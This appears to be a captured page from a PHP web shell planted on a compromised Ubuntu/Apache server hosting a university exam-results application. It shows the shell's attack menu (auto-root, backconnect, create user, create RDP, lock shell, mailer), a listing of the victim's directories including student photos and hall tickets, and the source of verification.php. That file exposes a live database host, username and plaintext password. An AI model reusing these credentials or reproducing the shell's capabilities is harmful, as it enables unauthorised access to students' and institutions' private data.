Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.100.40
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
guk_old /
[ HOME SHELL ]
Name
Size
Permission
Action
ExcelWriterXML
[ DIR ]
drwxr-xr-x
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
docverify
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
gridsrch
[ DIR ]
drwxr-xr-x
halltickets
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jqGrid4
[ DIR ]
drwxr-xr-x
jqgridn3.5
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libgd-gd-2.2.3
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
popups
[ DIR ]
drwxr-xr-x
results
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
teacher_photos
[ DIR ]
drwxrwxrwx
tmpphotos
[ DIR ]
drwxrwxrwx
MainPage.html
11.64
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
SubjectDetailsPopup.js
14.04
KB
-rwxr-xr-x
Thumbs.db
464
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
candidate_list.html
7.42
KB
-rwxr-xr-x
candidate_list.js
33.92
KB
-rwxr-xr-x
cconfig.php
1.06
KB
-rwxr-xr-x
collegeInfoPopup.html
3.75
KB
-rwxr-xr-x
freeze_module_at_admin_college...
9.74
KB
-rwxr-xr-x
homepage.html
3.05
KB
-rwxr-xr-x
index.html
7.34
KB
-rwxr-xr-x
indexlogin.html
5.76
KB
-rwxr-xr-x
load_mannual_js_files.js
23.28
KB
-rwxr-xr-x
mcverifydet.php
14.83
KB
-rwxr-xr-x
mregistry.php
71.66
KB
-rwxr-xr-x
mverifytranscript.php
14.62
KB
-rwxr-xr-x
report_attendance_summary.php
9.4
KB
-rwxr-xr-x
report_ra_invigilator_dairy.ph...
15.77
KB
-rwxr-xr-x
results.php
28.47
KB
-rwxr-xr-x
room_allotment.php
15.46
KB
-rwxr-xr-x
roomwise_register_nos_list.php
16.81
KB
-rwxr-xr-x
student.php
54.12
KB
-rwxr-xr-x
tarka-safari.css
5.95
KB
-rwxr-xr-x
verification.php
2.68
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : verification.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="stylesheet" type="text/css" href="css/basic.css" /> <!-- <link rel="stylesheet" type="text/css" href="css/jquery-ui-1.7.2.custom.css" /> --> <script type="text/javascript" src="js/jquery-1.8.3.js"></script> <script type="text/javascript" src="js/jquery.corner.js"></script> <script type="text/javascript" src="js/jscript.js"></script> <script type="text/javascript" src="js/curve-min.js"></script> <link rel="stylesheet" href="jquery-ui-1.9/themes/base/jquery.ui.all.css"> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <?php $servername = "72.167.46.92"; $username = "gcguser"; $password = "Logisys@2106"; $dbname = "resultsg_gcg"; // Create connection $conn = new mysqli($servername, $username, $password, $dbname); // Check connection if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } $get_data="select FUNIVCODE,FUNIVNAME,FUNIVADD1,pdf_logo_path from control"; $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { $FUNIVCODE=$row['FUNIVCODE']; $FUNIVNAME=$row['FUNIVNAME']; $FUNIVADD1=$row['FUNIVADD1']; $pdf_logo_path=$row['pdf_logo_path']; } } ?> <div id='main_frame'> <div class='header_main_div'> <div class='header_left_div' > <div class='header_log_left_div'><img height=103 width=120 src="<?php echo $pdf_logo_path?>"></div> </div> <div class='header_right_div'> <div class='header_right_txt_div'> <?php echo $FUNIVNAME?><br> <span id='span_address'><?php echo $FUNIVADD1?><br></span> </div> </div> <div style='clear:both;'> <div id='main_page_div'> <div id="index_main_page"> </div> <div id="index_main_page_right" onkeydown="dologin(event)"> </div> </div> <div id="Footer"> <div id="FooterInner"> <div id="FooterLink"> <div style="width: 350px; float: left; text-align: left; margin-left: 20px;"> <!-- <a href="AboutUs.aspx">About Us</a> | <a href="TermCondition.aspx">Registration Term Condition</a>--> </div> <div style="width: 220px; float: right;"> Powered by <a style="outline: 0;" target="_blank" href="http://www.logisys.org">Logisys</a> </div> </div> </div> </div> </div> </div>
Close